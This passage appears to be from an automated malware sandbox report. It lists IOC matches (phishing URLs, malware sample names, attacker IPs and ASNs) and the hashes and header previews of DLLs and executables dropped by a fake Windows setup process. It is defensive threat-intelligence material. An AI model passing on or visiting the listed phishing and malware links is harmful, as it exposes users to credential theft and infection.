                                                                                                                • 152.199.21.175
                                                                                                                https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                                                • 152.199.21.175
                                                                                                                View_alert_details_#[01KTO].htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 152.199.21.175
                                                                                                                https://sgwarch-my.sharepoint.com/:f:/p/setup1/EiozDTFdgcdOj57XSlxa0wgB_yucGXpVtBz0YeRUUS4djA?e=J1BMm6&xsdata=MDV8MDJ8bG9nYW5AaG9sdHhwLmNvbXw4NzViY2I1MjBhNzQ0NjAxMGYxODA4ZGQxODZlODVlN3w0Y2NhZDYyOTg3ZWM0MmRmOTU3YTYxMmI0OTU2YmE3NXwwfDB8NjM4NjkzNTg1MTc0NTY1ODEyfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKRmJYQjBlVTFoY0draU9uUnlkV1VzSWxZaU9pSXdMakF1TURBd01DSXNJbEFpT2lKWGFXNHpNaUlzSWtGT0lqb2lUV0ZwYkNJc0lsZFVJam95ZlE9PXwwfHx8&sdata=cmt5N3BwOXR0VGIwbDEyNWFnZmRKYVBMMzhQVUJ4bmJpNnppZGtydXJjST0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                • 152.199.21.175
                                                                                                                BGM LAW GROUP - RFP 2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                                • 152.199.21.175
                                                                                                                https://docs.google.com/presentation/d/e/2PACX-1vQdSuwONgWFnuoaK9jWkn4a4T1fFD4ixA3V2X7f5aWnD4sHxk2b10z2j2TMxkq3G15FQX3bbwReJ2PF/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                • 152.199.21.175
                                                                                                                http://editableslides.coGet hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                • 152.199.21.175
                                                                                                                s-part-0035.t-0009.t-msedge.netinstaller64v5.2.7.msiGet hashmaliciousUnknownBrowse
                                                                                                                • 13.107.246.63
                                                                                                                installer64v3.2.6.msiGet hashmaliciousUnknownBrowse
                                                                                                                • 13.107.246.63
                                                                                                                Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                • 13.107.246.63
                                                                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 13.107.246.63
                                                                                                                l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                TdloJt4gY3.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                QfBhv404w4.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                • 13.107.246.63
                                                                                                                726odELDs8.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                YrWaRb0IKJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                v5Evrl41VR.exeGet hashmaliciousLummaCBrowse
                                                                                                                • 13.107.246.63
                                                                                                                sni1gl.wpc.omegacdn.nethttp://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                • 152.199.21.175
                                                                                                                https://flowto.it/8tooc2sec?fc=0Get hashmaliciousUnknownBrowse
                                                                                                                • 152.199.21.175
                                                                                                                vFile__0054seconds__Airborn.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                Payout Receipts.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                Invoice for 04-09-24 fede39.admr.org.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 152.199.21.175
                                                                                                                api.company-target.comhttps://docs.zoom.us/doc/amQMYMv8RzCj0FS5-u7_7w?from=emailGet hashmaliciousUnknownBrowse
                                                                                                                • 13.227.8.6
                                                                                                                http://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyNDEwVExPTQ==&u=http:%2f%2fhidroregjioni-jugor.com%2fdayo/QNMvj/ZGF2aWRidWxsQGFya2ZpbmFuY2lhbC5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                • 108.158.75.78
                                                                                                                http://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                                                                                • 108.158.75.7
                                                                                                                https://atpscan.global.hornetsecurity.com/?d=zgarMAzqF8gJdiyz7BRUZX8-Kt1RoHrhrMmKtaU9kW8&f=VhLn9tqiibnSyqWDnEopjApZtye8WgAc5bwx7BMFWiKwqjA1EcPjZyfvoQy11klP&i=&k=QQhP&m=0jL9ajZ_jxYnMJb2yb4luNRYQCXy24RTS6RPwUyZoAcuBVX0kzGA69aOJSo0d2htwIsi238bOVH3h3HqrhJGfzTuFk7GTjJWYsgIrocXphf5x2p4nZ7S2EABjAck31fG&n=TU5FjsulXTMv8aeSlx257utLr9bUpfdm0dDB4GNEHfOuhOvtIOr62mZHw3PXGZeG&r=qntyoaxGftDLRu_wopiK2t_EdeZaeg9mP15ZZI-qDen_3s7cQ10pAlhKQQnYAIUX&s=c4a8f5ec353e41b8b414bdcf47b33dd5d6b52b0394e0e4a09cc54527f49761c3&u=https%3A%2F%2Fthe1oomisagency.com%2Fthyu%2FGet hashmaliciousUnknownBrowse
                                                                                                                • 18.66.102.75
                                                                                                                Invitation Letter from Ministry of Defence China.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 18.66.102.127
                                                                                                                https://us.services.docusign.net/webforms-ux/v1.0/forms/de9dbdc77cc2367bb50c45c4d2a0b8c4Get hashmaliciousUnknownBrowse
                                                                                                                • 18.66.102.98
                                                                                                                https://protect-us.mimecast.com/s/18vfCQWNWqS1V8BlCPhEHGoqRRGet hashmaliciousUnknownBrowse
                                                                                                                • 18.66.102.75
                                                                                                                http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                                • 18.245.199.109
                                                                                                                https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                • 18.66.102.75
                                                                                                                Douglas County Government.pdfGet hashmaliciousUnknownBrowse
                                                                                                                • 18.66.102.85

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                EDGECASTUSdb0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                • 152.195.101.222
                                                                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=hGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                https://contractnerds.com/Get hashmaliciousUnknownBrowse
                                                                                                                • 192.229.221.25
                                                                                                                http://assets.website-files.com/65efffe8d4e10d26910f0543/65f65633ab8b2f021b357c18_64146967722.pdfGet hashmaliciousUnknownBrowse
                                                                                                                • 152.195.15.58
                                                                                                                Audio02837498.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                https://en.newsnowbangla.com/archives/69912Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                                                                • 152.199.21.175
                                                                                                                http://usps.com-trackilw.top/usGet hashmaliciousUnknownBrowse
                                                                                                                • 192.229.221.165
                                                                                                                vFile__0054seconds__Airborn.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.21.175
                                                                                                                http://northwesthousingservices.discussripped.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 152.199.19.160
                                                                                                                CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCwyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                • 149.129.12.34
                                                                                                                V2clgnyM2J.exeGet hashmaliciousGhostRatBrowse
                                                                                                                • 8.218.163.85
                                                                                                                test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                • 47.90.135.102
                                                                                                                libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                • 47.254.174.185
                                                                                                                EpCAySF1G6.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 8.218.163.62
                                                                                                                EpCAySF1G6.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 8.218.163.62
                                                                                                                xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 47.245.158.74
                                                                                                                loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 47.57.184.195
                                                                                                                T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                                                                                • 8.212.102.187
                                                                                                                splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 47.253.191.95

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\$Windows.~WS\Sources\DU.dll7bYDInO.rtfGet hashmaliciousUnknownBrowse
                                                                                                                  C:\$Windows.~WS\Sources\DiagTrack.dllMediaCreationTool.batGet hashmaliciousUnknownBrowse
                                                                                                                    7bYDInO.rtfGet hashmaliciousUnknownBrowse

                                                                                                                      Created / dropped Files

                                                                                                                      C:\$WINDOWS.~BT\Sources\Panther\diagerr.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1908
                                                                                                                      Entropy (8bit):4.874587641202385
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:5I5aVbJDP+tUI0X3AN0/1Cvf/g3vvQ/1Cv8Gh/1Cvze/g3vO/1CvVL/1CvR/g3v9:5MwiGI0P4GsfT/7eLy
                                                                                                                      MD5:D1E75542EC8D1B4851765A57AC63618E
                                                                                                                      SHA1:A231451F545D3133E5D6A0487A59C5DBD01EE50E
                                                                                                                      SHA-256:6C06BF950D0FE3476E020CD363EC0C8C9D4EE0FC89A24C50780C44E6453995C6
                                                                                                                      SHA-512:89D3C182833B97B0899ECD45DE1439F8341BF2EA11578E2085375A4DB3CC18FAD221998DC4B6F4407381D2134CB43D78025349DED1E50B6A4EEA5919B18B168C
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

                                                                                                                      C:\$WINDOWS.~BT\Sources\Panther\diagwrn.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (375)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5021
                                                                                                                      Entropy (8bit):5.377084882345892
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:5MwiGdgbnE0jiecM40jiecq40jiecEG0jiecOGNaNG0yIGSSGStSDgGMVn61y:53gbELM4Lq4LEGLOGNQGWGhGSkDgGMxN
                                                                                                                      MD5:31374D761523E1F9182FA69ADDD707A8
                                                                                                                      SHA1:61BF403EB8FA026E8B877CAD570AD274F8C63610
                                                                                                                      SHA-256:3EAE7BD2992F9C2A24E3594761AD3F2AFD9A483FB3DCA26EE8BACD05FB1A269C
                                                                                                                      SHA-512:E5E6A9EB2C84EFF7D3C2AA0E6C35CA8508563F0917B98E0E9ED34462993A574D21322467A89647DCEB5E6FBFC23DC97F5CBA95917B998D309E12139D3F6E28E5
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

                                                                                                                      C:\$WINDOWS.~BT\Sources\Panther\setupact.log

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6467
                                                                                                                      Entropy (8bit):4.510943797224239
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:xdKS2W2PFam+r3CBcN5rBGzJDX0PPDXyZYqUFN+tDI2D2n02+C9NpTCrE2+:waT
                                                                                                                      MD5:AD3F6E5114DA9B17C7291AC68ED5AEDC
                                                                                                                      SHA1:0223FFCC393FEC36546DC5A25255920967E9D9B1
                                                                                                                      SHA-256:77D5E5F06B523859A04D78836A6511C7222F49B6397C8E66B529005E64815177
                                                                                                                      SHA-512:0B0FC11C94874130E436814C507BEB3B0CF3A7AF1982DC1FD0C6718A258C620955AE36F139019B69BA7654231AE9E9361AE05CEBB6692D202EE0F3FB2555B327
                                                                                                                      Malicious:false
                                                                                                                      Preview:.2024-12-29 07:39:09, Info SP CSetupPlatform::Initialize: Setup log starts:..2024-12-29 07:39:09, Info SP SEH: Enter CExceptionHandler::CExceptionHandler..2024-12-29 07:39:09, Info SP SEH: Exit CExceptionHandler::CExceptionHandler..2024-12-29 07:39:09, Info SP Host system information:.. VM: NO.. Firmware type: UEFI.. Manufacturer: r bx DzpCuuK6vk.. Model : 19c2 4LH.. BIOS name : VMW201.00V.20829224.B64.2211211842.. BIOS version : P1MFK.. BIOS release date : 20221121000000.000000+000.. Total memory : 8589934592.. Number of physical CPUs : 2.. Number of logical CPUs : 2

                                                                                                                      C:\$Windows.~WS\Sources\DU.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):123712
                                                                                                                      Entropy (8bit):6.460431067934838
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:7UTZhzH2+F3yOme7PNWCsWlMzeNDz7biF4jL4hgXE:GbF13PACNlDzS4Cn
                                                                                                                      MD5:7727A405C9878C2FE052922C1F965384
                                                                                                                      SHA1:12EF6479A97C7A6574CA8DD7BE6B64F47B79F710
                                                                                                                      SHA-256:4912ABC0A250DFAF63A48E4165E94AB701505F14BCC7A1464D5588FA2D434564
                                                                                                                      SHA-512:55C1A07BC932C619B585E3B883EAF581F5A0C5C8ED0AB1D1D0386DD344501746420D2541F0CD3CAFF984472AB65B8A7D49F5FD8821F45E5C4FA7194DDB89E09E
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: 7bYDInO.rtf, Detection: malicious, Browse
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..#wd}pwd}pwd}pc.~qud}pc.yqfd}pwd|p.d}pc.|qbd}pc.xq.d}pc.}qvd}pc.tqld}pc..pvd}pc..qvd}pRichwd}p........................PE..L....u.............!.........D.......j...............................................;....@A........................ ...................................@!..........0...T...............................@.......................@....................text....~.......................... ..`.data...............................@....idata..z...........................@..@.didat..............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\DiagTrack.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):922976
                                                                                                                      Entropy (8bit):6.46965241570797
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:Er+9jUr2TTWLQRPwMRlf+8Kh+fx6gmkwJKdMrtUIHkaMNUEP3g5Qy1Jxb3ArS:A+9jUr2TTr5LlfcwwggUhnNzg5Rbwr
                                                                                                                      MD5:6C3F6A6BC5EDE978E9DFE1ACCE386339
                                                                                                                      SHA1:3B7B51D762C593E92123F9365A896ED64EE26A7A
                                                                                                                      SHA-256:B55D66F2943F1C63EA9B39DAE88AA2A4F91775CEFFFEFD263BD302866A7BD91C
                                                                                                                      SHA-512:3F87064354A0F55F36AA272C5918D208B8A77FFFB7965E9B50727C06FD8D8DB5E6695636A7DB37926FE444C91E4A4A7DC892EF5EF57676BA9515216D5E5F94FF
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: MediaCreationTool.bat, Detection: malicious, Browse
                                                                                                                      • Filename: 7bYDInO.rtf, Detection: malicious, Browse
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b...&..&..&..J..*..&....J.....J..(..J..(..J..'..J.....J..'..J..'..Rich&..........................PE..L.....2V...........-.........d...............................................P......D.....@A........................ ...]...`...@.......p...............`!..........N..8...........................HO..@...............\.......@....................text...}........................... ..`.data...............................@....idata...&.......(..................@..@.didat.. ...........................@....rsrc...p...........................@..@.reloc..............`..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\DiagTrackRunner.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):79040
                                                                                                                      Entropy (8bit):5.68085764397868
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:ctlKhKIqVXrOLgef8j1D8KxLQgSSQlsJkGAsC:SlYKrOMso1D8KxLQgSdKJMsC
                                                                                                                      MD5:76F30A1E149792D2542A253B920CBEF6
                                                                                                                      SHA1:9040E0873DF5CC2A64B850D1B8159B77528BA62C
                                                                                                                      SHA-256:488CBC8330952DD13B797BB40E4E30610ED03483C25919C39555F7B334A3C159
                                                                                                                      SHA-512:EC39861A3F39F88AAD52975974C988AE76376A09136D95F5D4FEDD60EE7EC252736D882CEF77298D82D786E0DAD13C61148B29D7C5FB7BA7D7C74B05DE9D7E84
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S....-%.P....-&.F....-'.U....-;.X...S........-#.R....-9.R....-$.R...RichS...................PE..L...Y.2V.................V...........U.......p....@..........................0......M.....@.................................,...x........................<... .......#..8............................$..@...............(............................text...0U.......V.................. ..`.data........p.......Z..............@....idata...............\..............@..@.rsrc................d..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\Diager.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):41792
                                                                                                                      Entropy (8bit):6.371638869251201
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:GjGabdDxVfFrX8khxIWdOghUak3h1PQRVta:G9dDxNFrX80IWdOdaeXP4ta
                                                                                                                      MD5:4396BDD1707419909F04A92184AD1317
                                                                                                                      SHA1:EAA238531420DCFBDB864FA31BD95373B53977D7
                                                                                                                      SHA-256:AE0F8123D3EF8801961211D7D71780BEE76C418EBC8C6893B385D5FABA6BB68F
                                                                                                                      SHA-512:D7E526A1BB8B7D4FB91DE5F10DD1CD1A005DD26AEC7839B22E66303BADA8ECBA34E92F2467EA510584C29C93C51A78C4FA36849050F72BFEDA456671136AA8EC
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h.Z.,.4.,.4.,.4.8.7...4.8.0.".4.,.5...4.8.5.#.4.8.1.).4.8.4.-.4.8.=.%.4.8..-.4.8.6.-.4.Rich,.4.........................PE..L...E9.I...........!.....^...".......X.......p............................................@A.........................e......P...........................@!...........$..T...............................@...............L....d..@....................text...j\.......^.................. ..`.data........p.......b..............@....idata...............d..............@..@.didat...............t..............@....rsrc................v..............@..@.reloc...............z..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\MediaSetupUIMgr.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\LineInst.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15634744
                                                                                                                      Entropy (8bit):2.7509316397129315
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:mzKrn9w8KDsQ/z20NoJDZVm4z0VdwmTRjnaQbjAKz7h8n5Ou:AK+8KQ820aXVdz0VdwmTRjamPh8n5L
                                                                                                                      MD5:BDBD14F60FC78EDCA16A022C9801CF70
                                                                                                                      SHA1:E24CE3852CC9D42296C3FD550735069B86D7518A
                                                                                                                      SHA-256:A2679D717DB07F43D81F895E508520E01CD0262F1BE5870333D12CE71FE02DB4
                                                                                                                      SHA-512:6D6AA6AA8108D49347B4D5B40C632E568D44805D6352B517363262A408F7E04CAFB3A66D1CB121BF920DF080C7119401C454F90BA9A47FFE593CE9CB11DA78B8
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.2;Kja;Kja;Kja/ i`=Kja/ n`-Kja/ k`.Kja;Kka.Ija/ o`0Kja/ j`:Kja/ c`^Kja/ .a:Kja/ h`:KjaRich;Kja........................PE..L................-.........T..............0.......................................%....@A........................P&..X.......h.......L............p..8!...@..........T...........................p...@............................................text............................... ..`.data...tK...0...&..................@....idata...#.......$...B..............@..@.rsrc................f..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\$Windows.~WS\Sources\Panther\Eula.rtf

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):262144
                                                                                                                      Entropy (8bit):4.647786492863431
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:sT9Ps8LkRAdnz0g2qnCcuwXiSjwJ7RSnhkcA9Zs5uu3lQ:sVwzgF
                                                                                                                      MD5:535FA80FA78584C5490B8820F7B093BF
                                                                                                                      SHA1:41CDC82F1E6E7DC1AC468011B4651341DF8276C8
                                                                                                                      SHA-256:E023F0A07CC39DFB37FE89A32CFA36C7721624D6857FD6406B4FE508A749C8D7
                                                                                                                      SHA-512:6D59B1B2808B939AD101BE08DA7662FE0B5DC8F254C197577FCF50F390FE75A15A5206458627787BE697D09528C5BB3676807067FCCC36DC1810085BBE057024
                                                                                                                      Malicious:false
                                                                                                                      Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff40\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f11\fbidi \froman\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt \'82\'6c\'82\'72 \'96\'be\'92\'a9};}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f40\fbidi \fswiss\fcharset0\fprq2{\*\panose 00000000000000000000}Tahoma;}{\f41\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}{\f43\fbidi \froman\fcharset128\fprq1{\*\panose 02020609040205080304}@MS Mincho;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02

                                                                                                                      C:\$Windows.~WS\Sources\Panther\diagerr.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (501), with CRLF, LF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):0.5384181033686862
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:5MwiGI0P4GsfT/7YQPoBQWEA49Q2eeYz:5MwiGdgbnHP3WEKle
                                                                                                                      MD5:2DBBAAB374BD7C3B7B5DAD4ACD397099
                                                                                                                      SHA1:1C9D614446A544A5E460C6C510C2BEB2F110A2E1
                                                                                                                      SHA-256:5728B7A1C143DB1AB8862D91772062B5FB55196DD32AFCBB69676CA452E70E73
                                                                                                                      SHA-512:A03B8E39C43F7D61377A1BE45172784B049A9FE6FE4B43B64D1E9E920747DB60F68E4615AE484D8B5DDCE5CC8DE2323BB13A78D99864F945AD7AFE7793E59FF5
                                                                                                                      Malicious:false
                                                                                                                      Preview:.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

                                                                                                                      C:\$Windows.~WS\Sources\Panther\diagwrn.xml

                                                                                                                      Download File
                                                                                                                      Process:C:\$Windows.~WS\Sources\SetupHost.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (333)
                                                                                                                      Category:dropped
